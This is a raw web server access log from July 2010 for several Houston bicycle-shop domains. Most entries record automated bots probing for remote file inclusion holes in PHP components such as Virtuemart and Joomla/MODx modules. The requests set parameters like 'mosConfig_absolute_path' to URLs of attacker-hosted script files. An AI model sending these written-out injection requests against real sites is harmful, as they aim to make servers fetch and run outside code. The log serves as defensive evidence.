87.117.234.106 - - [13/Jul/2010:09:22:25 -0700] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.sman3-yog.sch.id/modul/p1.txt??????? HTTP/1.0" 200 2924 "-" "Mozilla/5.0" "www.svbikes.com"
87.117.234.106 - - [13/Jul/2010:09:23:22 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.sman3-yog.sch.id/modul/p1.txt??????? HTTP/1.1" 200 1764 "-" "Mozilla/5.0" "svbikes.com"
87.117.234.106 - - [13/Jul/2010:09:23:22 -0700] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.sman3-yog.sch.id/modul/p1.txt??????? HTTP/1.1" 200 2940 "-" "Mozilla/5.0" "svbikes.com"
87.117.234.106 - - [13/Jul/2010:09:23:23 -0700] "GET /logs/access_091010.log/?_SERVER[DOCUMENT_ROOT]=http://www.sman3-yog.sch.id/modul/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "svbikes.com"
209.160.33.117 - - [13/Jul/2010:09:26:18 -0700] "GET /logs/access.log/?_SERVER[DOCUMENT_ROOT]=http://www.sman3-yog.sch.id/modul/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
209.160.33.117 - - [13/Jul/2010:09:27:10 -0700] "GET /logs/access_100510.log/?_SERVER[DOCUMENT_ROOT]=http://www.sman3-yog.sch.id/modul/p1.txt??????? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
209.160.33.117 - - [13/Jul/2010:09:27:10 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.sman3-yog.sch.id/modul/p1.txt??????? HTTP/1.1" 200 1764 "-" "Mozilla/5.0" "www.svbikes.com"
209.160.33.117 - - [13/Jul/2010:09:27:11 -0700] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.sman3-yog.sch.id/modul/p1.txt??????? HTTP/1.1" 200 2940 "-" "Mozilla/5.0" "www.svbikes.com"
209.160.33.117 - - [13/Jul/2010:09:28:05 -0700] "GET /logs/access_091010.log/?_SERVER[DOCUMENT_ROOT]=http://www.sman3-yog.sch.id/modul/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "svbikes.com"
209.160.33.117 - - [13/Jul/2010:09:28:05 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.sman3-yog.sch.id/modul/p1.txt??????? HTTP/1.1" 200 1764 "-" "Mozilla/5.0" "svbikes.com"
209.160.33.117 - - [13/Jul/2010:09:28:05 -0700] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.sman3-yog.sch.id/modul/p1.txt??????? HTTP/1.1" 200 2940 "-" "Mozilla/5.0" "svbikes.com"
95.50.85.99 - - [13/Jul/2010:09:31:05 -0700] "GET /logs/access.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.miranda.gov.ve/Weborb/Protocols/chelly.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
95.50.85.99 - - [13/Jul/2010:09:31:06 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.miranda.gov.ve/Weborb/Protocols/chelly.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
95.50.85.99 - - [13/Jul/2010:09:31:06 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.miranda.gov.ve/Weborb/Protocols/chelly.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
119.63.193.75 - - [13/Jul/2010:09:33:03 -0700] "GET /bullitinboard/viewtopic.php HTTP/1.1" 200 128 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "www.svbikes.com"
200.62.176.2 - - [13/Jul/2010:09:33:21 -0700] "GET /logs/access.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.miranda.gov.ve/Weborb/Protocols/chelly.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "houstonbikeshop.com"
200.62.176.2 - - [13/Jul/2010:09:33:22 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.miranda.gov.ve/Weborb/Protocols/chelly.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "houstonbikeshop.com"
200.62.176.2 - - [13/Jul/2010:09:33:22 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.miranda.gov.ve/Weborb/Protocols/chelly.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "houstonbikeshop.com"
119.63.193.75 - - [13/Jul/2010:09:35:09 -0700] "GET /bullitinboard/viewtopic.php?p=4429 HTTP/1.1" 200 533 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "www.svbikes.com"
87.238.162.205 - - [13/Jul/2010:09:36:03 -0700] "GET /logs/access_091010.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://b0tn3t.fileave.com/respon.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "svbikes.com"
87.238.162.205 - - [13/Jul/2010:09:36:03 -0700] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://b0tn3t.fileave.com/respon.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "svbikes.com"
87.238.162.205 - - [13/Jul/2010:09:36:04 -0700] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://b0tn3t.fileave.com/respon.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "svbikes.com"
202.12.74.247 - - [13/Jul/2010:09:39:37 -0700] "GET /tools/send_reminders.php?includedir=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
202.12.74.247 - - [13/Jul/2010:09:39:37 -0700] "GET /translations/Spanish.txt//tools/send_reminders.php?includedir=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
202.12.74.247 - - [13/Jul/2010:09:39:37 -0700] "GET /translations//tools/send_reminders.php?includedir=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
202.12.74.247 - - [13/Jul/2010:09:40:45 -0700] "GET /translations/Spanish.txt%20%20//tools/send_reminders.php?includedir=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
87.238.162.205 - - [13/Jul/2010:09:42:46 -0700] "GET /%20http://h1.ripway.com/plit/ourcrew2.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "svbikes.com"
202.12.74.247 - - [13/Jul/2010:09:45:04 -0700] "GET /tools/send_reminders.php?includedir=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
202.12.74.247 - - [13/Jul/2010:09:45:04 -0700] "GET /logs//tools/send_reminders.php?includedir=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
202.12.74.247 - - [13/Jul/2010:09:45:04 -0700] "GET /logs/access_100510.log//tools/send_reminders.php?includedir=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
67.195.115.87 - - [13/Jul/2010:09:46:17 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "houstonbikeshop.com"
67.195.115.87 - - [13/Jul/2010:09:46:18 -0700] "GET /bullitinboard/viewtopic.php?p=1661 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "houstonbikeshop.com"
95.50.85.99 - - [13/Jul/2010:09:47:34 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.miranda.gov.ve/Weborb/Protocols/chelly.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "bicyclestoreshouston.com"
200.62.176.2 - - [13/Jul/2010:09:48:19 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.miranda.gov.ve/Weborb/Protocols/chelly.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "bicyclestoreshouston.com"
87.238.162.205 - - [13/Jul/2010:09:50:31 -0700] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://b0tn3t.fileave.com/respon.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "svbikes.com"
87.238.162.205 - - [13/Jul/2010:09:50:32 -0700] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://b0tn3t.fileave.com/respon.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "svbikes.com"
125.141.91.138 - - [13/Jul/2010:09:54:45 -0700] "GET /skin/zero_vote/error.php?dir=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "svbikes.com"
125.141.91.138 - - [13/Jul/2010:09:54:45 -0700] "GET /logs/access_091010.log//skin/zero_vote/error.php?dir=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "svbikes.com"
125.141.91.138 - - [13/Jul/2010:09:54:45 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "svbikes.com"
195.42.120.131 - - [13/Jul/2010:09:55:55 -0700] "GET /logs/access_100510.log//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.net-games.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
195.42.120.131 - - [13/Jul/2010:09:55:55 -0700] "GET /logs//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.net-games.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
195.42.120.131 - - [13/Jul/2010:09:55:55 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.net-games.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
69.73.157.122 - - [13/Jul/2010:09:56:37 -0700] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://b0tn3t.fileave.com/respon.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "houstonbikeshop.com"
69.73.157.122 - - [13/Jul/2010:09:56:37 -0700] "GET /kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://b0tn3t.fileave.com/respon.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "houstonbikeshop.com"
195.42.120.131 - - [13/Jul/2010:09:56:40 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.net-games.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
195.42.120.131 - - [13/Jul/2010:09:56:40 -0700] "GET /logs//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.net-games.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
195.42.120.131 - - [13/Jul/2010:09:56:40 -0700] "GET /logs/access_100510.log//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.net-games.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
67.226.27.23 - - [13/Jul/2010:09:59:39 -0700] "GET / HTTP/1.1" 200 1764 "http://locator.trekbikes.com/locator/search" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10" "www.svbikes.com"
67.226.27.23 - - [13/Jul/2010:09:59:40 -0700] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10" "www.svbikes.com"
67.226.27.23 - - [13/Jul/2010:09:59:43 -0700] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10" "www.svbikes.com"
66.249.65.25 - - [13/Jul/2010:10:01:11 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.svbikes.com"
125.141.91.138 - - [13/Jul/2010:10:01:40 -0700] "GET /skin/zero_vote/error.php?dir=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
125.141.91.138 - - [13/Jul/2010:10:01:40 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
125.141.91.138 - - [13/Jul/2010:10:01:40 -0700] "GET /logs/access.log%20%20//skin/zero_vote/error.php?dir=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
212.174.28.46 - - [13/Jul/2010:10:04:31 -0700] "GET /translations/Spanish.txt//tools/send_reminders.php?includedir=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
212.174.28.46 - - [13/Jul/2010:10:04:31 -0700] "GET /translations//tools/send_reminders.php?includedir=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
212.174.28.46 - - [13/Jul/2010:10:05:43 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
212.174.28.46 - - [13/Jul/2010:10:05:43 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
212.174.28.46 - - [13/Jul/2010:10:05:44 -0700] "GET /logs/access.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
212.174.28.46 - - [13/Jul/2010:10:08:59 -0700] "GET /tools/send_reminders.php?includedir=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
212.174.28.46 - - [13/Jul/2010:10:08:59 -0700] "GET /logs//tools/send_reminders.php?includedir=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
212.174.28.46 - - [13/Jul/2010:10:09:09 -0700] "GET /logs/access_100510.log//tools/send_reminders.php?includedir=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
125.141.91.138 - - [13/Jul/2010:10:13:11 -0700] "GET /login.php?dir=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
125.141.91.138 - - [13/Jul/2010:10:13:11 -0700] "GET /logs/access_100510.log//login.php?dir=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
125.141.91.138 - - [13/Jul/2010:10:13:11 -0700] "GET /logs//login.php?dir=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
119.63.198.9 - - [13/Jul/2010:10:24:33 -0700] "GET /bullitinboard/viewtopic.php?p=13461 HTTP/1.1" 200 533 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "www.svbikes.com"
81.169.156.197 - - [13/Jul/2010:10:25:16 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://BYE515.fileave.com/rfiid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "houstonbikeshop.com"
81.169.156.197 - - [13/Jul/2010:10:25:16 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://BYE515.fileave.com/rfiid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "houstonbikeshop.com"
81.169.156.197 - - [13/Jul/2010:10:25:16 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://BYE515.fileave.com/rfiid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "houstonbikeshop.com"
81.169.156.197 - - [13/Jul/2010:10:25:16 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://BYE515.fileave.com/rfiid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "houstonbikeshop.com"
95.50.85.99 - - [13/Jul/2010:10:38:25 -0700] "GET /logs/access_091210.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.miranda.gov.ve/Weborb/Protocols/chelly.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "bicyclestoreshouston.com"
95.50.85.99 - - [13/Jul/2010:10:38:25 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.miranda.gov.ve/Weborb/Protocols/chelly.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "bicyclestoreshouston.com"
95.50.85.99 - - [13/Jul/2010:10:38:26 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.miranda.gov.ve/Weborb/Protocols/chelly.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "bicyclestoreshouston.com"
202.12.74.249 - - [13/Jul/2010:10:42:33 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
202.12.74.249 - - [13/Jul/2010:10:42:33 -0700] "GET /logs/access.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
202.12.74.249 - - [13/Jul/2010:10:42:33 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.62.176.2 - - [13/Jul/2010:10:43:03 -0700] "GET /logs/access_091210.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.miranda.gov.ve/Weborb/Protocols/chelly.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "bicyclestoreshouston.com"
200.62.176.2 - - [13/Jul/2010:10:43:03 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.miranda.gov.ve/Weborb/Protocols/chelly.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "bicyclestoreshouston.com"
200.62.176.2 - - [13/Jul/2010:10:43:04 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.miranda.gov.ve/Weborb/Protocols/chelly.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "bicyclestoreshouston.com"
222.236.47.182 - - [13/Jul/2010:11:01:09 -0700] "GET /ask_password.php?+dir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
222.236.47.182 - - [13/Jul/2010:11:01:11 -0700] "GET /logs//ask_password.php?+dir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
222.236.47.182 - - [13/Jul/2010:11:01:11 -0700] "GET /logs/access.log//ask_password.php?+dir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
216.17.105.143 - - [13/Jul/2010:11:07:07 -0700] "GET /logs//ask_password.php?dir=http://razi.teo.ir/images/maghale/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
216.17.105.143 - - [13/Jul/2010:11:07:07 -0700] "GET /logs/access.log%20%20//ask_password.php?dir=http://razi.teo.ir/images/maghale/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
216.17.105.143 - - [13/Jul/2010:11:07:08 -0700] "GET /ask_password.php?dir=http://razi.teo.ir/images/maghale/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
216.17.105.143 - - [13/Jul/2010:11:07:42 -0700] "GET /ask_password.php?dir=http://razi.teo.ir/images/maghale/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
216.17.105.143 - - [13/Jul/2010:11:07:42 -0700] "GET /logs//ask_password.php?dir=http://razi.teo.ir/images/maghale/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
216.17.105.143 - - [13/Jul/2010:11:07:52 -0700] "GET /logs/access.log//ask_password.php?dir=http://razi.teo.ir/images/maghale/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
212.174.28.46 - - [13/Jul/2010:11:11:07 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "svbikes.com"
212.174.28.46 - - [13/Jul/2010:11:11:14 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "svbikes.com"
212.174.28.46 - - [13/Jul/2010:11:17:40 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
212.174.28.46 - - [13/Jul/2010:11:17:40 -0700] "GET /logs/access.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
212.174.28.46 - - [13/Jul/2010:11:17:43 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
113.30.66.24 - - [13/Jul/2010:11:19:32 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
113.30.66.24 - - [13/Jul/2010:11:19:32 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
113.30.66.24 - - [13/Jul/2010:11:19:32 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
113.30.66.24 - - [13/Jul/2010:11:21:28 -0700] "GET /logs/access.log%20%20//index.php?_REQUEST=&_REQUEST[option]=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
113.30.66.24 - - [13/Jul/2010:11:21:29 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
113.30.66.24 - - [13/Jul/2010:11:21:29 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
202.12.74.249 - - [13/Jul/2010:11:23:34 -0700] "GET /include/write.php?dir=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
202.12.74.249 - - [13/Jul/2010:11:23:34 -0700] "GET /logs//include/write.php?dir=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
202.12.74.249 - - [13/Jul/2010:11:23:34 -0700] "GET /logs/access.log%20%20//include/write.php?dir=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
174.133.253.139 - - [13/Jul/2010:11:24:18 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=http://demo.oss.org.cn/e107-0720/e107_files/images/.log? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
174.133.253.139 - - [13/Jul/2010:11:24:18 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=http://demo.oss.org.cn/e107-0720/e107_files/images/.log? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
174.133.253.139 - - [13/Jul/2010:11:24:18 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=http://demo.oss.org.cn/e107-0720/e107_files/images/.log? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
174.133.253.139 - - [13/Jul/2010:11:24:18 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=http://demo.oss.org.cn/e107-0720/e107_files/images/.log? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
174.133.253.139 - - [13/Jul/2010:11:24:18 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=http://demo.oss.org.cn/e107-0720/e107_files/images/.log? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
174.133.253.139 - - [13/Jul/2010:11:24:19 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=http://demo.oss.org.cn/e107-0720/e107_files/images/.log? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
174.133.253.139 - - [13/Jul/2010:11:24:25 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=http://demo.oss.org.cn/e107-0720/e107_files/images/.log? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
174.133.253.139 - - [13/Jul/2010:11:24:25 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=http://demo.oss.org.cn/e107-0720/e107_files/images/.log? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
174.133.253.139 - - [13/Jul/2010:11:24:31 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=http://demo.oss.org.cn/e107-0720/e107_files/images/.log? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
174.133.253.139 - - [13/Jul/2010:11:24:31 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=http://demo.oss.org.cn/e107-0720/e107_files/images/.log? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
174.133.253.139 - - [13/Jul/2010:11:24:31 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=http://demo.oss.org.cn/e107-0720/e107_files/images/.log? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
174.133.253.139 - - [13/Jul/2010:11:24:31 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=http://demo.oss.org.cn/e107-0720/e107_files/images/.log? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
